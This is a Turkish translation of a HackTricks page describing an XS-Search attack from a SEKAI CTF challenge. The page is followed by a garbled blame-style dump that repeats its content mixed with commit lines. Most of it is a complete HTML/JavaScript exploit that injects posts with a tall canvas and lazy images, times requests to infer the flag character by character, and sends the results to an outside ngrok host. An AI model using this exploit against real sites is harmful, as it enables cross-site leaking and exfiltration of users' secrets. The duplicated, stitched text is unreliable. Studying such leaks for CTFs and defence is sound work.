hacktricks/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md

# Olay Döngüsü Engelleme + Tembel Resimler

<details>

<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>

* Bir **cybersecurity şirketinde** çalışıyor musunuz? **Şirketinizi HackTricks'te** reklamını görmek ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter**'da takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**'ya PR göndererek paylaşın.

</details>

[**Bu saldırıda**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) **tembel resim yan kanal** tekniğini HTML enjeksiyonu ile birleştirerek **olay döngüsü engelleme tekniği** kullanarak karakter sızdırır.

Bu, zaten aşağıdaki sayfada yorumlanan bir CTF zorluk için **farklı bir saldırıdır**. Daha fazla bilgi için zorluk hakkında aşağıdaki sayfaya bakın:

{% content-ref url="connection-pool-example.md" %}
[connection-pool-example.md](connection-pool-example.md)
{% endcontent-ref %}

Bu saldırının arkasındaki fikir şudur:

* Gönderiler alfabetik olarak yüklenir.
* Bir **saldırgan**, **"A"** ile başlayan bir **gönderi** enjekte edebilir, ardından biraz **HTML etiketi** (büyük bir **`<canvas`**) çoğu **ekranı dolduracak** ve bazı son **`<img lazy` etiketleri** şeyleri yüklemek için.
* Saldırgan, yerine "A" ile başlayan aynı gönderiyi enjekte ederse. **Bayrakla birlikte** **gönderi** önce görünecek, ardından **enjekte edilen** **gönderi** "z" ile başlayacak ve **büyük** **canvas** görünecektir. Bayrakla birlikte gönderi önce göründüğü için, ilk canvas tüm ekranı kaplayacak ve enjekte edilen **son** **`<img lazy`** etiketleri ekranında görünmeyeceği için yüklenmeyecektir.
* Ardından, bot sayfaya erişirken, saldırgan **fetch istekleri gönderecektir**.&#x20;
* Eğer gönderiye enjekte edilen **resimler yükleniyorsa**, bu **fetch** istekleri daha **uzun sürecektir**, bu nedenle saldırgan gönderinin bayraktan **önce** olduğunu bilir (alfabetik olarak).
* Eğer **fetch** istekleri **hızlı** ise, bu, gönderinin bayraktan **sonra** alfabetik olarak olduğu anlamına gelir.

Kodu kontrol edelim:
```html
<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>

<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>

<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>

<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'

const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')

// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1

// I have omited code here as apparently it wasn't necesary

// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}

}, 0)

async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()

setTimeout(() => {
run(str, resolve)
}, 500)
})
}

async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}

let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)

/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}

// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}

</script>
</body>
</html>
```
<details>

<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>

* Bir **cybersecurity şirketinde mi çalışıyorsunuz**? **Şirketinizi HackTricks'te reklamını görmek** ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu keşfedin.
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter**'da beni takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)'ya PR göndererek paylaşın**.

</details>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								# Olay Döngüsü Engelleme + Tembel Resimler
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
 								<details>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Bir **cybersecurity şirketinde** çalışıyor musunuz? **Şirketinizi HackTricks'te** reklamını görmek ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu
 								* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
 								* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter**'da takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 								* **Hacking hilelerinizi [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**'ya PR göndererek paylaşın.
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
 								</details>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								[**Bu saldırıda**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) **tembel resim yan kanal** tekniğini HTML enjeksiyonu ile birleştirerek **olay döngüsü engelleme tekniği** kullanarak karakter sızdırır.
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bu, zaten aşağıdaki sayfada yorumlanan bir CTF zorluk için **farklı bir saldırıdır**. Daha fazla bilgi için zorluk hakkında aşağıdaki sayfaya bakın:
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
 								{% content-ref url="connection-pool-example.md" %}
 								[connection-pool-example.md](connection-pool-example.md)
 								{% endcontent-ref %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bu saldırının arkasındaki fikir şudur:
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Gönderiler alfabetik olarak yüklenir.
 								* Bir **saldırgan**, **"A"** ile başlayan bir **gönderi** enjekte edebilir, ardından biraz **HTML etiketi** (büyük bir **`<canvas`**) çoğu **ekranı dolduracak** ve bazı son **`<img lazy` etiketleri** şeyleri yüklemek için.
 								* Saldırgan, yerine "A" ile başlayan aynı gönderiyi enjekte ederse. **Bayrakla birlikte** **gönderi** önce görünecek, ardından **enjekte edilen** **gönderi** "z" ile başlayacak ve **büyük** **canvas** görünecektir. Bayrakla birlikte gönderi önce göründüğü için, ilk canvas tüm ekranı kaplayacak ve enjekte edilen **son** **`<img lazy`** etiketleri ekranında görünmeyeceği için yüklenmeyecektir.
 								* Ardından, bot sayfaya erişirken, saldırgan **fetch istekleri gönderecektir**.&#x20;
 								* Eğer gönderiye enjekte edilen **resimler yükleniyorsa**, bu **fetch** istekleri daha **uzun sürecektir**, bu nedenle saldırgan gönderinin bayraktan **önce** olduğunu bilir (alfabetik olarak).
 								* Eğer **fetch** istekleri **hızlı** ise, bu, gönderinin bayraktan **sonra** alfabetik olarak olduğu anlamına gelir.
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Kodu kontrol edelim:
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
+								```html
 								<!DOCTYPE html>
 								<html>
 								<!--
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
 								If images are loading, the request to "/" is slower, otherwise faster.
 								By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
 								We can use fetch to measure the request time.
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
+								-->
 								<body>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<button onclick="run()">start</button>
 								<!-- Inject post with payload -->
 								<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
 								<input id=inp name="text" value="">
 								</form>
 								<!-- Remove index -->
 								<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
 								<input id=inp2 name="index" value="">
 								</form>
 								<script>
 								let flag = 'SEKAI{'
 								const TARGET = 'https://safelist.ctf.sekai.team'
 								f.action = TARGET + '/create'
 								f2.action = TARGET + '/remove'
 								const sleep = ms => new Promise(r => setTimeout(r, ms))
 								// Function to leak info to attacker
 								const send = data => fetch('http://server.ngrok.io?d='+data)
 								const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')
 								// start exploit
 								let count = 0
 								setTimeout(async () => {
 								let L = 0
 								let R = charset.length - 1
 								// I have omited code here as apparently it wasn't necesary
 								// fallback to linerar since I am not familiar with binary search lol
 								for(let i=R; i>=L; i--) {
 								let c = charset[i]
 								send('try_' + flag + c)
 								const found = await testChar(flag + c)
 								if (found) {
 								send('found: '+ flag+c)
 								flag += c
 								break
 								}
 								}
 								}, 0)
 								async function testChar(str) {
 								return new Promise(resolve => {
 								/*
 								For 3350, you need to test it on your local to get this number.
 								The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
 								If starts with "A", the image should be loaded because it's in the threshold.
 								*/
 								// <canvas height="3350px"> is experimental and allow to show the injected
 								// images when the post injected is the first one but to hide them when
 								// the injected post is after the post with the flag
 								inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
 								f.submit()
 								setTimeout(() => {
 								run(str, resolve)
 								}, 500)
 								})
 								}
 								async function run(str, resolve) {
 								// Open posts page 5 times
 								for(let i=1; i<=5;i++) {
 								window.open(TARGET)
 								}
 								let t = 0
 								const round = 30 //Lets time 30 requests
 								setTimeout(async () => {
 								// Send 30 requests and time each
 								for(let i=0; i<round; i++) {
 								let s = performance.now()
 								await fetch(TARGET + '/?test', {
 								mode: 'no-cors'
 								}).catch(err=>1)
 								let end = performance.now()
 								t += end - s
 								console.log(end - s)
 								}
 								const avg = t/round
 								// Send info about how much time it took
 								send(str + "," + t + "," + "avg:" + avg)
 								/*
 								I get this threshold(1000ms) by trying multiple times on remote admin bot
 								for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
 								*/
 								const isFound = (t >= 1000)
 								if (isFound) {
 								inp2.value = "0"
 								} else {
 								inp2.value = "1"
 								}
 								// remember to delete the post to not break our leak oracle
 								f2.submit()
 								setTimeout(() => {
 								resolve(isFound)
 								}, 200)
 								}, 200)
 								}
 								</script>
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
+								</body>
 								</html>
 								```
 								<details>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Bir **cybersecurity şirketinde mi çalışıyorsunuz**? **Şirketinizi HackTricks'te reklamını görmek** ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu keşfedin.
 								* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
 								* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter**'da beni takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 								* **Hacking hilelerinizi [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)'ya PR göndererek paylaşın**.
-												GitBook: [#3600] No subject

											
										
										
											2022-10-12 19:31:39 +00:00
 								</details>